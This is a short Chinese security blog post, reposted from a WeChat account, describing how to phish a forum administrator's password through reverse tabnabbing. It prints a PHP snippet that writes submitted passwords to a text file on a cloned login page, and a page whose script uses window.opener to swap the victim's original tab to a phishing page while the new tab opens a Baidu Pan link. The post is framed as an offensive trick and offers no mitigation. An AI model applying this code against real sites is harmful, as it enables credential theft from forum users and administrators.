【奇技淫巧】看我如何在论坛进行钓鱼

admin 2021年8月16日22:41:04评论82 views字数 550阅读1分50秒阅读模式

【奇技淫巧】看我如何在论坛进行钓鱼


用户点击了某个网站中带有target=”_blank”属性的超链接后,浏览器会单独新建一个标签页来显示该链接所指向的内容。但是请注意,在这一瞬间,浏览器会允许新建的标签页通过一个名为“window.opener”的浏览器API来与之前的网页进行短暂通信。


比如我要钓鱼一个论坛的后台密码,我先把他的html保存下载,然后我添加几行代码,示例代码如下:
$content = $_POST['name']
file_put_contents('password.txt',$content);
打开以后是这样的


【奇技淫巧】看我如何在论坛进行钓鱼


然后我再创建个diaoyu.php文件,事例代码如下:
<meta http-equiv="refresh" content="1;url="https://pan.baidu.com/s/1eRFAiUQ">
<script>
if(window.opener){
  window.opener.location  = "http://127.0.0.1/phish.php";
}
</script>

然后比如我发个帖,发完是这样的


【奇技淫巧】看我如何在论坛进行钓鱼


点击以后是新开标签页是调到了百度盘,如图


【奇技淫巧】看我如何在论坛进行钓鱼


但是刚刚的标签页跳到了phish.php页面,


【奇技淫巧】看我如何在论坛进行钓鱼


然后不小心输入密码以后,


【奇技淫巧】看我如何在论坛进行钓鱼


过程

【奇技淫巧】看我如何在论坛进行钓鱼




【奇技淫巧】看我如何在论坛进行钓鱼


本文始发于微信公众号(T00ls):【奇技淫巧】看我如何在论坛进行钓鱼

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月16日22:41:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【奇技淫巧】看我如何在论坛进行钓鱼https://cn-sec.com/archives/349056.html

发表评论

匿名网友 填写信息